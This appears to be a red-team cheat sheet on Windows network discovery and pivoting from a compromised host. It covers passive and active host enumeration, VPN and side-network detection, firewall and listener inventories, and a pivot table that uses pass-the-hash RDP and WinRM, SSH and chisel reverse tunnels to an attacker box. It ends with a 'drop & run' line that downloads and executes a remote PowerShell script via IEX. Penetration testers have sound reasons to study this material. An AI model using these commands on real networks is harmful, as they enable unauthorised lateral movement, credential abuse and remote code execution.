# Windows Internal Device Scan

────────────────────────

### Phase 1 – 100% Passive (0 network noise)

```powershell
# 1. Interfaces + IPs (cleanest view)
ipconfig /all
Get-NetIPConfiguration | Select InterfaceAlias,IPv4Address,InterfaceDescription

# 2. Routing table – pure gold: extra subnets, static/persistent routes and VPN ranges all show up here
route print
Get-NetRoute -AddressFamily IPv4 | Sort DestinationPrefix | ft -AutoSize

# 3. ARP cache = hosts the box has already talked to (reading it sends zero packets; Incomplete/Unreachable entries are failed lookups, not hosts)
arp -a
Get-NetNeighbor -AddressFamily IPv4 | Where { $_.State -notin 'Incomplete','Unreachable' } | ft -AutoSize

# 4. Local hosts file + DNS servers (hosts entries often name internal servers; in a domain the DNS servers are usually the DCs)
type C:\Windows\System32\drivers\etc\hosts
Get-DnsClientServerAddress -AddressFamily IPv4
```

Instant TL;DR one-liner (run this in the first 10 seconds; findstr treats each space-separated token as a separate pattern, so it is a quick look, not a precise filter):

```powershell
clear; "=== IPs ==="; ipconfig | findstr "IPv4"; "=== Routes ==="; route print | findstr "0.0.0.0 10. 172. 192."; "=== ARP (live hosts) ==="; arp -a | findstr "dynamic"; "=== DNS ==="; Get-DnsClientServerAddress -AddressFamily IPv4 | ft -Wrap
```

────────────────────────

### Phase 2 – Low-Noise Active Discovery

```powershell
# Ping-sweep every directly connected /24 so the replies (and the ARP requests that precede them) refresh the neighbor cache.
# Hosts that drop ICMP at their firewall still answer ARP, so check arp -a afterwards rather than trusting the ping results.
# "Low noise" is not silent: 254 echoes per subnet are easy to spot on an IDS, so only sweep subnets this box is actually on.
$subnets = Get-NetRoute -AddressFamily IPv4 | ? { $_.NextHop -eq '0.0.0.0' -and $_.DestinationPrefix -like '*/24' } |
           % { $_.DestinationPrefix.Split('/')[0] -replace '\.\d+$','.' } | Sort-Object -Unique
# One ping.exe per host instead of one Start-Job per host: a job is a whole PowerShell process, and $_ is not visible inside it
foreach ($s in $subnets) { 1..254 | % { Start-Process ping.exe -ArgumentList "-n 1 -w 200 $s$_" -WindowStyle Hidden } }
Start-Sleep -s 6; "Updated ARP cache:"; arp -a
```
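The Phase 1 route/ARP reading and the Phase 2 sweep above, put together as a reusable script. This is an added example, not code from the original page: the function names (`Get-OnLinkSubnet`, `Invoke-QuietSweep`, `Get-LiveNeighbor`) and the batch/timeout parameters are my own choices, and it assumes Windows PowerShell 5.1 or later with the NetTCPIP module. It goes beyond the one-liner in two ways a practitioner cares about: the probe rate is bounded (so "low noise" is an actual number), and the neighbor cache is filtered so multicast, broadcast and failed-lookup entries do not masquerade as live hosts.

```powershell
# Added example (not from the original page). Assumes Windows PowerShell 5.1+ with the
# NetTCPIP module (Get-NetRoute / Get-NetNeighbor); the function names are my own.

function Get-OnLinkSubnet {
    # On-link (directly connected) routes carry NextHop 0.0.0.0. Restricting to /24 keeps the
    # "a.b.c" prefix arithmetic below honest; widen it yourself for larger on-link networks.
    Get-NetRoute -AddressFamily IPv4 |
        Where-Object { $_.NextHop -eq '0.0.0.0' -and $_.DestinationPrefix -like '*/24' -and
                       $_.DestinationPrefix -notlike '169.254.*' } |
        ForEach-Object { $_.DestinationPrefix.Split('/')[0] -replace '\.\d+$', '' } |
        Sort-Object -Unique
}

function Invoke-QuietSweep {
    # ICMP echoes with an explicit timeout, a bounded number in flight and a pause between
    # batches (that pause is the rate limit). Returns the ICMP responders, but the real payoff
    # is the ARP cache: it is updated even for hosts whose firewall drops the echo, because the
    # ARP exchange happens before the echo leaves this box.
    param(
        [Parameter(Mandatory)][string[]]$Prefix,   # e.g. '10.10.5'
        [int]$TimeoutMs    = 200,
        [int]$BatchSize    = 32,
        [int]$BatchDelayMs = 250
    )
    $alive = New-Object System.Collections.Generic.List[string]
    foreach ($p in $Prefix) {
        $targets = 1..254 | ForEach-Object { "$p.$_" }
        for ($i = 0; $i -lt $targets.Count; $i += $BatchSize) {
            $last  = [Math]::Min($i + $BatchSize, $targets.Count) - 1
            $batch = @($targets[$i..$last])
            $tasks = @(foreach ($ip in $batch) {
                (New-Object System.Net.NetworkInformation.Ping).SendPingAsync($ip, $TimeoutMs)
            })
            # WaitAll throws if any probe faulted (e.g. unreachable network); faulted tasks are skipped below
            try { [System.Threading.Tasks.Task]::WaitAll([System.Threading.Tasks.Task[]]$tasks) } catch { }
            for ($j = 0; $j -lt $batch.Count; $j++) {
                $t = $tasks[$j]
                if ($t.Status -eq 'RanToCompletion' -and $t.Result.Status -eq 'Success') { $alive.Add($batch[$j]) }
            }
            Start-Sleep -Milliseconds $BatchDelayMs
        }
    }
    return $alive
}

function Get-LiveNeighbor {
    # Neighbor cache minus the entries that are never real hosts: failed lookups, multicast
    # (224-239.x.x.x), the limited broadcast and the broadcast MAC. The '.255' filter assumes
    # /24s; a host at x.y.z.255 inside a larger prefix would be dropped by it.
    Get-NetNeighbor -AddressFamily IPv4 |
        Where-Object {
            $_.State -notin 'Unreachable', 'Incomplete' -and
            $_.IPAddress -notmatch '^(22[4-9]|23\d)\.' -and
            $_.IPAddress -notmatch '\.255$' -and
            $_.IPAddress -ne '255.255.255.255' -and
            $_.LinkLayerAddress -ne 'FF-FF-FF-FF-FF-FF'
        } |
        Select-Object IPAddress, LinkLayerAddress, State, InterfaceAlias
}

# Usage: passive view first, then the sweep, then read the cache back.
$subnets = Get-OnLinkSubnet
if ($subnets) {
    "On-link /24s: $($subnets -join ', ')"
    $icmp = Invoke-QuietSweep -Prefix $subnets
    "ICMP responders: $($icmp.Count)"
    Get-LiveNeighbor | Sort-Object { [version]$_.IPAddress } | Format-Table -AutoSize
} else {
    "No on-link /24 routes found; check Get-NetRoute for wider prefixes."
}
```

Raise `-BatchDelayMs` (or drop `-BatchSize`) when the engagement rules call for a slower footprint; the default of 32 probes every 250 ms finishes a /24 in about two seconds, which is still well above what a rate-based ICMP alert will tolerate on a quiet network.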

────────────────────────
### Phase 3 – Hidden Networks & Tunnels (Windows loves these)

```powershell
# Hyper-V / VMware / VirtualBox / VPN adapters (often sit on separate internal nets); -IncludeHidden catches the ones GUI tools hide
Get-NetAdapter -IncludeHidden | Where InterfaceDescription -Match "Hyper-V|VMware|VirtualBox|VPN|TAP|WireGuard|Tailscale|ZeroTier" | ft Name,Status,InterfaceDescription

# WireGuard / OpenVPN / Tailscale / ZeroTier / Nebula – processes and services (Windows service names differ from the Linux daemons: Tailscale, not tailscaled)
Get-Process -Name "wireguard*","openvpn*","tailscale*","zerotier*","nebula*" -ErrorAction SilentlyContinue
Get-Service WireGuard*,Tailscale*,ZeroTier*,OpenVPN* -ErrorAction SilentlyContinue | ft

# Cloud VM adapters (Azure: Hyper-V or Mellanox, AWS: Amazon ENA / AWS PV, GCP: VirtIO); names like "Ethernet 2" are just Windows defaults, so match on the description
Get-NetAdapter | Where InterfaceDescription -Match "Hyper-V|Mellanox|Amazon|AWS PV|VirtIO" | ft Name,Status,InterfaceDescription

# Windows VPN profiles (per-user and machine-wide); a split-tunnel VPN adds internal routes without changing your default gateway
Get-VpnConnection -ErrorAction SilentlyContinue | ft Name,ServerAddress,SplitTunneling,AllUserConnection
Get-VpnConnection -AllUserConnection -ErrorAction SilentlyContinue | ft Name,ServerAddress,SplitTunneling,AllUserConnection
```
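The adapter and VPN checks above each answer one question; the thing you actually want is a single view of every interface that is not the normal way out, with the prefixes the route table says live behind it. This is an added example, not code from the original page: the function name `Get-SideNetwork` and the "side network" label are mine, and it assumes PowerShell 5.1 or later with the NetTCPIP and NetAdapter modules.

```powershell
# Added example (not from the original page). Assumes PowerShell 5.1+ with the NetTCPIP and
# NetAdapter modules; the function name and the "side network" label are my own.

function Get-SideNetwork {
    # The interface that owns the default route is the normal path out. Every other interface
    # holding an IPv4 address is a side network: VPN, virtual switch, cloud secondary NIC, ...
    # Prefixes lists what the route table says is reachable only through that interface.
    $default = Get-NetRoute -AddressFamily IPv4 -DestinationPrefix '0.0.0.0/0' -ErrorAction SilentlyContinue |
               Sort-Object RouteMetric, InterfaceMetric | Select-Object -First 1
    $routes  = Get-NetRoute -AddressFamily IPv4 | Where-Object {
        $_.DestinationPrefix -notmatch '^(0\.0\.0\.0/0$|127\.|169\.254\.|22[4-9]\.|23\d\.|255\.255\.255\.255)' -and
        $_.DestinationPrefix -notlike '*/32'      # host routes for the interface's own address
    }
    $addrs = Get-NetIPAddress -AddressFamily IPv4 | Where-Object {
        $_.IPAddress -notlike '127.*' -and $_.IPAddress -notlike '169.254.*'
    }
    foreach ($a in $addrs) {
        $nic    = Get-NetAdapter -InterfaceIndex $a.InterfaceIndex -IncludeHidden -ErrorAction SilentlyContinue
        $viaNic = $routes | Where-Object InterfaceIndex -eq $a.InterfaceIndex |
                  Select-Object -ExpandProperty DestinationPrefix | Sort-Object -Unique
        [pscustomobject]@{
            Interface     = $a.InterfaceAlias
            Description   = $nic.InterfaceDescription
            Address       = "$($a.IPAddress)/$($a.PrefixLength)"
            IsDefaultPath = [bool]($default -and $a.InterfaceIndex -eq $default.InterfaceIndex)
            VirtualOrVpn  = [bool]($nic.InterfaceDescription -match 'Hyper-V|VMware|VirtualBox|VPN|TAP|WireGuard|Tailscale|ZeroTier|Nebula')
            Prefixes      = ($viaNic -join ', ')
        }
    }
}

# Side networks first; the default-path interface sorts last so the interesting rows are on top.
Get-SideNetwork | Sort-Object IsDefaultPath | Format-Table -AutoSize -Wrap
```

A row with `IsDefaultPath = False` and a non-empty `Prefixes` column is a network this host can reach that your attacker box cannot; that is the pivot target list for the table further down.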

────────────────────────

### Phase 4 – Firewall Rules & What You Can Actually Reach

```powershell
# Start with the defaults: Windows Firewall allows ALL outbound unless DefaultOutboundAction is Block, so "no allow rule" proves nothing
Get-NetFirewallProfile | ft Name,Enabled,DefaultInboundAction,DefaultOutboundAction

# Outbound rules with their remote ranges (netsh prints one field per line, so match the field names; "Action.*Allow.*Destination" never matches)
netsh advfirewall firewall show rule name=all dir=out | findstr /i /C:"Rule Name:" /C:"Action:" /C:"RemoteIP:"

# Full export (needs local admin); the PowerShell view works as a normal user
netsh advfirewall export "C:\windows\temp\fw.wfw"
Get-NetFirewallRule -Enabled True -Direction Outbound | ft DisplayName,Action,Profile -AutoSize
# Only this host's firewall is visible here; the far end's firewall and any network ACL in between still get a vote
```
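Because the outbound default is Allow, the rules that matter are the enabled outbound Block rules, and a rule is only meaningful together with the address, port and program filters attached to it. The following script joins them and also reports which profile each interface is currently on, since a Public-profile rule does nothing on a Domain interface. This is an added example, not code from the original page: `Get-OutboundRestriction` is my own function name, it assumes PowerShell 5.1 or later with the NetSecurity module, and it reads the ActiveStore so group-policy rules are included alongside local ones.

```powershell
# Added example (not from the original page). Assumes PowerShell 5.1+ with the NetSecurity
# module; the function name is my own. ActiveStore = local + GPO rules as currently enforced.

function Get-OutboundRestriction {
    param([string]$PolicyStore = 'ActiveStore')
    # 1. Profile defaults. Windows Firewall ships with DefaultOutboundAction = Allow, so an empty
    #    Allow list means nothing; only Block rules (or a Block default) actually restrict you.
    $profiles = Get-NetFirewallProfile -PolicyStore $PolicyStore |
                Select-Object Name, Enabled, DefaultInboundAction, DefaultOutboundAction
    # 2. Which profile each interface is on right now (Domain/Private/Public) decides which rules apply.
    $active = Get-NetConnectionProfile | Select-Object InterfaceAlias, NetworkCategory
    # 3. Enabled outbound Block rules joined with their address, port and program filters.
    $blocks = Get-NetFirewallRule -PolicyStore $PolicyStore -Direction Outbound -Enabled True -Action Block -ErrorAction SilentlyContinue |
        ForEach-Object {
            $addr = $_ | Get-NetFirewallAddressFilter
            $port = $_ | Get-NetFirewallPortFilter
            $app  = $_ | Get-NetFirewallApplicationFilter
            [pscustomobject]@{
                Rule       = $_.DisplayName
                Profile    = $_.Profile
                Program    = $app.Program
                Protocol   = $port.Protocol
                RemotePort = ($port.RemotePort -join ',')
                RemoteAddr = ($addr.RemoteAddress -join ',')
            }
        }
    [pscustomobject]@{ Profiles = $profiles; ActiveProfiles = $active; BlockRules = $blocks }
}

$fw = Get-OutboundRestriction
$fw.Profiles       | Format-Table -AutoSize
$fw.ActiveProfiles | Format-Table -AutoSize
$fw.BlockRules     | Format-Table -AutoSize -Wrap
# Reminder: this describes only this host's firewall. The remote host and any network ACL in between still apply.
```

Read the three tables top-down: a profile with `DefaultOutboundAction = Block` means you need an Allow rule for every hop you plan; otherwise only the rows in `BlockRules` whose `Profile` matches the interface's `NetworkCategory` (or `Any`) can stop you.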

────────────────────────

### Phase 5 – Listening Ports = Pivot Capability FROM This Box

```powershell
# Listeners reachable from the network (0.0.0.0 and :: mean "every interface", so they belong here, not in the local-only list)
Get-NetTCPConnection -State Listen | Where LocalAddress -notmatch '^(127\.|::1$)' | ft LocalAddress,LocalPort,State,OwningProcess

# Loopback-only services (invisible from the network – perfect for port forwarding through this box)
Get-NetTCPConnection -State Listen | Where LocalAddress -match '^(127\.|::1$)' | ft LocalAddress,LocalPort,OwningProcess

# Bonus: translate process IDs to names (netstat -b needs admin; this join does not)
Get-NetTCPConnection -State Listen | Select LocalAddress,LocalPort,@{n='Process';e={(Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).ProcessName}} | ft -AutoSize
netstat -ano | findstr LISTENING
```
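The two listener queries above split on loopback versus everything else; in practice you want TCP and UDP together, the owning process resolved, and each socket tagged by how far it is reachable so the forward-through candidates fall out directly. This is an added example, not code from the original page: `Get-ListenerInventory` is my own function name, it assumes PowerShell 5.1 or later with the NetTCPIP module, and it runs without admin (the `Path` column is empty for processes you are not allowed to open).

```powershell
# Added example (not from the original page). Assumes PowerShell 5.1+ with the NetTCPIP module;
# the function name is my own. Works without admin; Path is $null for processes you cannot open.

function Get-ListenerInventory {
    # TCP listeners + UDP endpoints, each tagged with who owns it and how far it is reachable:
    #   Loopback      - 127.x / ::1 only  -> invisible from the network, forward-through candidate
    #   AllInterfaces - 0.0.0.0 / ::      -> reachable on every NIC, including any side network
    #   Specific      - bound to one address
    $procs = @{}
    Get-Process | ForEach-Object { $procs[$_.Id] = $_ }
    $tcp = Get-NetTCPConnection -State Listen | ForEach-Object {
        [pscustomobject]@{ Proto = 'TCP'; Address = $_.LocalAddress; Port = $_.LocalPort; ProcessId = [int]$_.OwningProcess } }
    $udp = Get-NetUDPEndpoint | ForEach-Object {
        [pscustomobject]@{ Proto = 'UDP'; Address = $_.LocalAddress; Port = $_.LocalPort; ProcessId = [int]$_.OwningProcess } }
    foreach ($l in @($tcp) + @($udp)) {
        $scope = switch -Regex ($l.Address) {
            '^(127\.|::1$)'      { 'Loopback'; break }
            '^(0\.0\.0\.0|::)$'  { 'AllInterfaces'; break }
            default              { 'Specific' }
        }
        $p    = $procs[$l.ProcessId]   # OwningProcess is UInt32; the cast above makes the hashtable lookup match Get-Process's Int32 Id
        $path = $null
        try { $path = $p.Path } catch { }
        [pscustomobject]@{
            Proto = $l.Proto; Address = $l.Address; Port = $l.Port; Scope = $scope
            ProcessId = $l.ProcessId; Process = $p.ProcessName; Path = $path
        }
    }
}

$inv = Get-ListenerInventory
"Reachable from the network:"
$inv | Where-Object Scope -ne 'Loopback' | Sort-Object Proto, Port |
    Format-Table Proto, Address, Port, Scope, ProcessId, Process -AutoSize
"Loopback-only (port-forward through this box to reach them):"
$inv | Where-Object { $_.Scope -eq 'Loopback' -and $_.Proto -eq 'TCP' } | Sort-Object Port |
    Format-Table Address, Port, ProcessId, Process, Path -AutoSize
```

An `AllInterfaces` row on a host with a side network (Phase 3) is reachable from that side network too, which is usually not what its owner intended; a `Loopback` row is the classic local-forward target (`ssh -L` or a SOCKS pivot plus `127.0.0.1:port` from the attacker side).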

────────────────────────

### Instant Pivot Techniques (from YOUR attacker box)

| Goal                          | Command (run from Kali/attacker unless noted)                         |
|-------------------------------|------------------------------------------------------------------------|
| SOCKS proxy (full network)    | `ssh -D 1080 administrator@TARGET` (needs an OpenSSH server on TARGET) or your C2's SOCKS (Covenant/Beacon) |
| RDP through pivot             | `proxychains xfreerdp /v:TARGET /u:admin /pth:HASH /dynamic-resolution` (pass-the-hash over RDP only works if Restricted Admin mode is enabled on TARGET) |
| WinRM through pivot           | `proxychains evil-winrm -i TARGET -u admin -H HASH`                   |
| Port forward one service      | `ssh -L 3389:10.10.5.50:3389 administrator@PIVOT`, then connect to `127.0.0.1:3389` |
| Full subnet tunnel            | **Ligolo-ng** (agent on PIVOT, proxy on attacker), **Chisel**, **sshuttle -r admin@PIVOT 10.10.0.0/16** (sshuttle needs Python on the pivot, so Linux pivots only) |
| Fastest reverse tunnel        | attacker: `chisel server -p 9000 --reverse` → on PIVOT: `chisel client ATTACKER:9000 R:1080:socks`, then `proxychains` via `127.0.0.1:1080` |

────────────────────────

### ONE-LINER TO RULE THEM ALL (drop & run immediately)

```powershell
# "yourhandle/winpivot" is a placeholder – point this at a script you host. This is also the loudest line on the page:
# AMSI sees the downloaded script body, and WebClient + IEX is a pattern most EDRs flag on sight.
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/yourhandle/winpivot/main/run.ps1')
```

(Or paste this if you can’t reach GitHub:)

```powershell
clear; hostname; "IPs"; ipconfig | sls "IPv4"; "Routes"; route print | sls " 0.0.0.0| 10\.| 172\.1[6-9]\.| 172\.2[0-9]\.| 172\.3[0-1]\.| 192\.168\."; "Live hosts"; arp -a; "Listening ports"; netstat -ano | sls LISTEN
```

───────────────

#RedTeam #Pentest #Windows #Pivoting #OffensiveSecurity

